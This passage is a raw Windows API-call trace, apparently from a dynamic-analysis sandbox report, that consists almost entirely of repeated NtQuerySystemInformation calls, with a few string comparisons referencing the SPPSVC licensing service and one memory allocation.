(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb10, Length=0x28, ResultLength=0x0) [0189.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbf0, Length=0x38, ResultLength=0x0) [0189.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda70, Length=0x20, ResultLength=0x0) [0189.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9f0, Length=0x20, ResultLength=0x0) [0189.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9f0, Length=0x20, ResultLength=0x0) [0189.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9f0, Length=0x20, ResultLength=0x0) [0189.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbf0, Length=0x38, ResultLength=0x0) [0189.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda70, Length=0x20, ResultLength=0x0) [0189.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x20, ResultLength=0x0) [0189.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x20, ResultLength=0x0) [0189.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde80, Length=0x50, ResultLength=0x0) [0189.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde00, Length=0x28, ResultLength=0x0) [0189.661] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0189.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde80, Length=0x50, ResultLength=0x0) [0189.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde80, Length=0x50, ResultLength=0x0) [0189.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde80, Length=0x50, ResultLength=0x0) [0189.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddb0, Length=0x38, ResultLength=0x0) [0189.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbe0, Length=0x28, ResultLength=0x0) [0189.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbe0, Length=0x28, ResultLength=0x0) [0189.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbe0, Length=0x28, ResultLength=0x0) [0189.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc50, Length=0x28, ResultLength=0x0) [0189.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddb0, Length=0x38, ResultLength=0x0) [0189.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdcd0, Length=0x28, ResultLength=0x0) [0189.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdcd0, Length=0x28, ResultLength=0x0) [0189.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddb0, Length=0x38, ResultLength=0x0) [0189.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc30, Length=0x20, ResultLength=0x0) [0189.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbb0, Length=0x20, ResultLength=0x0) [0189.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbb0, Length=0x20, ResultLength=0x0) [0189.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbb0, Length=0x20, ResultLength=0x0) [0189.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddb0, Length=0x38, ResultLength=0x0) [0189.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc30, Length=0x20, ResultLength=0x0) [0189.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbc0, Length=0x20, ResultLength=0x0) [0189.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbc0, Length=0x20, ResultLength=0x0) [0189.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde80, Length=0x50, ResultLength=0x0) [0189.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde00, Length=0x28, ResultLength=0x0) [0189.675] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0189.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde80, Length=0x50, ResultLength=0x0) [0189.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde80, Length=0x50, ResultLength=0x0) [0189.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde80, Length=0x50, ResultLength=0x0) [0189.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddb0, Length=0x38, ResultLength=0x0) [0189.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbe0, Length=0x28, ResultLength=0x0) [0189.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbe0, Length=0x28, ResultLength=0x0) [0189.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbe0, Length=0x28, ResultLength=0x0) [0189.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc50, Length=0x28, ResultLength=0x0) [0189.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddb0, Length=0x38, ResultLength=0x0) [0189.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdcd0, Length=0x28, ResultLength=0x0) [0189.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdcd0, Length=0x28, ResultLength=0x0) [0189.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddb0, Length=0x38, ResultLength=0x0) [0189.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc30, Length=0x20, ResultLength=0x0) [0189.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbb0, Length=0x20, ResultLength=0x0) [0189.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbb0, Length=0x20, ResultLength=0x0) [0189.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbb0, Length=0x20, ResultLength=0x0) [0189.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddb0, Length=0x38, ResultLength=0x0) [0189.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc30, Length=0x20, ResultLength=0x0) [0189.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbc0, Length=0x20, ResultLength=0x0) [0189.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbc0, Length=0x20, ResultLength=0x0) [0189.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe020, Length=0x48, ResultLength=0x0) [0189.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe020, Length=0x48, ResultLength=0x0) [0189.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdee0, Length=0x28, ResultLength=0x0) [0189.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdee0, Length=0x28, ResultLength=0x0) [0189.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdee0, Length=0x28, ResultLength=0x0) [0189.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdee0, Length=0x28, ResultLength=0x0) [0189.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdee0, Length=0x28, ResultLength=0x0) [0189.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdee0, Length=0x28, ResultLength=0x0) [0189.691] LocalAlloc (uFlags=0x0, uBytes=0x5a) returned 0x27fc9873cc0 [0189.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdee0, Length=0x28, ResultLength=0x0) [0189.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdee0, Length=0x28, ResultLength=0x0) [0189.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdee0, Length=0x28, ResultLength=0x0) [0189.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde60, Length=0x20, ResultLength=0x0) [0189.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde60, Length=0x20, ResultLength=0x0) [0189.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdee0, Length=0x28, ResultLength=0x0) [0189.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde60, Length=0x20, ResultLength=0x0) [0189.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde60, Length=0x20, ResultLength=0x0) [0189.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdee0, Length=0x28, ResultLength=0x0) [0189.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdee0, Length=0x28, ResultLength=0x0) [0189.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe020, Length=0x48, ResultLength=0x0) [0189.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf80, Length=0x40, ResultLength=0x0) [0189.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf80, Length=0x40, ResultLength=0x0) [0189.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdec8, Length=0x28, ResultLength=0x0) [0189.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdec8, Length=0x28, ResultLength=0x0) [0189.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdec8, Length=0x28, ResultLength=0x0) [0189.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdec8, Length=0x28, ResultLength=0x0) [0189.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdec8, Length=0x28, ResultLength=0x0) [0189.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdec8, Length=0x28, ResultLength=0x0) [0189.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdec8, Length=0x28, ResultLength=0x0) [0189.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde30, Length=0x20, ResultLength=0x0) [0189.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde30, Length=0x20, ResultLength=0x0) [0189.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdec8, Length=0x28, ResultLength=0x0) [0189.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf80, Length=0x40, ResultLength=0x0) [0189.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf80, Length=0x40, ResultLength=0x0) [0189.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf80, Length=0x40, ResultLength=0x0) [0189.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdee0, Length=0x20, ResultLength=0x0) [0189.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdee0, Length=0x20, ResultLength=0x0) [0189.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdee0, Length=0x20, ResultLength=0x0) [0189.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf80, Length=0x40, ResultLength=0x0) [0189.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf10, Length=0x20, ResultLength=0x0) [0189.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdeb0, Length=0x20, ResultLength=0x0) [0189.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdeb0, Length=0x20, ResultLength=0x0) [0189.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.695] 